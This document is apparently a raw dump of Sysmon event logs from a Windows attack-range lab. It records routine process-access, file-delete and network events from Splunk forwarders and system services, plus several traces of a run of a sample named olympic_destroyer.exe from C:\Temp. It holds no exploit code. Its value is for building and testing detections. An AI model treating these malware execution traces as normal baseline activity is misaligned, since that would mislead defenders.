10341000x8000000000000000295205Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:21.237{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295204Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:21.237{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295203Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:21.236{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-14F1-6216-B906-000000003802}4864C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000295202Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:21.236{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295201Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:21.236{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295200Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:21.235{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-14F1-6216-B906-000000003802}4864C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000295199Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:21.234{C8EA50B7-14F1-6216-B906-000000003802}4864C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000295198Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:21.194{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8F10326B5B609B5BFD86AF35E743C6B4,SHA256=652E94FE73A74C90C20DB836DD776A04060EF8D534C821F8641BB9F2631E5914,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219306Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:22.959{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4552D64905180C7D2724892A99FDF349,SHA256=617506194C7C083BB907331F46E55E39F030C2BCEC23BFAB958B398F0F851185,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295207Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:22.212{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8384F6EFC1ED46823B2F1FCD05009E32,SHA256=0550D8696A20457417F207F98CF27AE54F7D0E0C798092377748E6CFF4A77360,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219308Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:23.990{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5D279E48756C4444FCDEB2429EF44632,SHA256=DA2E72BF83F6E9104E316C34D3009BAC754F03299BF089068C2907E3B2E69CC3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219307Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:23.272{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DDD6E9D8797ED240FD8A553D6F49BBB5,SHA256=E176230E1D9EBDE42B1F5920D3B1E73E1BD32CBE053B68D4B1AAB1722492A0DD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295208Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:23.219{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D8111CE813C8B6ECE680A47D92698A1D,SHA256=B1FA60CAAADC7016A8EFDBE9976B6B1BB50A65E56C22CF8939A680713A885C6A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295209Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:24.222{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5052FF9FD9F2D436478975BC45583A50,SHA256=5C8CDF9484B07B1C8295929FA989C418A8B24AEEE65FCB0F5CB267C9467C4B61,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000295214Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:25.979{C8EA50B7-F2AD-6215-C000-000000003802}48564964C:\Windows\Explorer.EXE{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+55bd0|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9824|UNKNOWN(FFFFF8036DEEEFD8)|UNKNOWN(FFFFEA43A72A5B68)|UNKNOWN(FFFFEA43A72A5CE7)|UNKNOWN(FFFFEA43A72A0371)|UNKNOWN(FFFFEA43A72A1D3A)|UNKNOWN(FFFFEA43A729FFF6)|UNKNOWN(FFFFF8036DC06503)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5942b|C:\Windows\System32\SHELL32.dll+dac8a|C:\Windows\System32\SHCORE.dll+33fad 10341000x8000000000000000295213Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:25.978{C8EA50B7-F2AD-6215-C000-000000003802}48564964C:\Windows\Explorer.EXE{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+556b1|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9824|UNKNOWN(FFFFF8036DEEEFD8)|UNKNOWN(FFFFEA43A72A5B68)|UNKNOWN(FFFFEA43A72A5CE7)|UNKNOWN(FFFFEA43A72A0371)|UNKNOWN(FFFFEA43A72A1D3A)|UNKNOWN(FFFFEA43A729FFF6)|UNKNOWN(FFFFF8036DC06503)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5942b|C:\Windows\System32\SHELL32.dll+dac8a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000295212Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:25.978{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms~RF8c1fc3.TMPMD5=C788ACA089D90F3A1A6EC3105767DB64,SHA256=342A88EE39B2F3B46C5FF775B5CA8B205D1F4E2D15CC4151DC918B0596F20C38,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295211Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:25.239{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=024021E221E78838741A1C5619E6E134,SHA256=AAF613E4A39A141224777BEC030F9722CD4DBACB1A805E61039FDDC19CADBBAD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219309Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:25.022{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FEDD831C789A7C91AEC35D1DFE882C4C,SHA256=EC7528085D03361CDFD9BD5314C647D640FE3649397D2816BE7B63AFF013621C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000295210Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:21.671{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49208-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000295217Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:26.893{C8EA50B7-F11F-6215-0D00-000000003802}8883340C:\Windows\system32\svchost.exe{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295216Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:26.893{C8EA50B7-F11F-6215-0D00-000000003802}8883340C:\Windows\system32\svchost.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000295215Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:26.250{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0B91E2E429AF4088AC2853CD2E783605,SHA256=86D6C145B912E20F2CD5A373DE75D0615CE1069E30224D7CD6DC0B8D28C2EC85,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219312Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:26.287{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=68145C8F3D3755576F4A3EBA7805A41A,SHA256=489AA8B4FC676870D15ABDEE6B3B7F0AF64AF7B1B657651D0A76AF4E4CDD59FB,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219311Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:23.564{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx63843-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 23542300x8000000000000000219310Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:26.037{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=45301092E702466C7BA636EFCE696444,SHA256=7F7175C522CCAF98D8EF53F1BFA0529F7A07C591E0976B929B9BC35C1AFF068E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000295220Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:27.642{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000295219Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:27.639{C8EA50B7-14DC-6216-AE06-000000003802}2460C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 23542300x8000000000000000295218Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:27.275{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=10A26B45215F32AC7383552393F6A4EF,SHA256=3A65AE5996431BD80ABE7ED4229CE4B2FBB740DCA20C07EE481EFAB539C5E543,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219313Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:27.272{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FB974A968880935449B54B377647A922,SHA256=0E00DED532A83EF56ED4C8C81958EF675B7D19FCBBC760D70723B3202BAC77E6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219315Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:28.412{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A34FB684295A79F93B44F8603280ADBF,SHA256=3124E56FC916B20B96DD4E0972DBBDCD681A6E3440D2907A1E59DB14DB51538B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295221Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:28.315{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AC37A7F14B87A363C9173C8E7D5AEED0,SHA256=F237F94DBCF49D5F849ED3819591FEAA6B2A9BE17B8FE29C8079B76AFD67F85F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219314Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:25.658{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51513-false10.0.1.12-8000- 23542300x8000000000000000219318Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:29.834{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FCBB45F96D370E4E133AB4840F466B66,SHA256=C067EB06C2B415FB62E3AF0CA6544064544B76C5F93160443D6DFE1BC3B9E05E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219317Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:29.646{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B1478FDC764C39C529A227B5993EC050,SHA256=C31483B23CECD50B5A91FB4289E5DD12778708C0473FCB0D0CF6203487442F73,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000295223Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:27.580{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49211-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000295222Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:29.323{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7F44920854EC0F4FE4D52F55FA4BBA49,SHA256=D6783CC9A76FC7E23B084B62CCC3CE42AC38CC7CE456CEFEFA4479D0895BB330,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219316Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:26.604{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx63301-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 23542300x8000000000000000219320Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:30.678{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=04CD869E9C184C6FED145946B18CA0D8,SHA256=A5DF4F26A0706D4074BAA349ED67A768F6EF66D3DE37DBB87CFEEB795E40D052,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295224Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:30.343{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=70313088C490076060A62E3354AF7202,SHA256=878229C13AB0D650E27BFADA412A23DF7454725B695FF1C6B819FE0E3674601A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219319Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:30.397{4F8D34B0-F11C-6215-1100-000000003902}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=546A4C52D2CC7A9938E0F5D64BD543A4,SHA256=D55F5EAADA70C6D887D056C1C9A750FB3C76C3A471E2D0A1C68265949DA1BB74,IMPHASH=00000000000000000000000000000000falsetrue 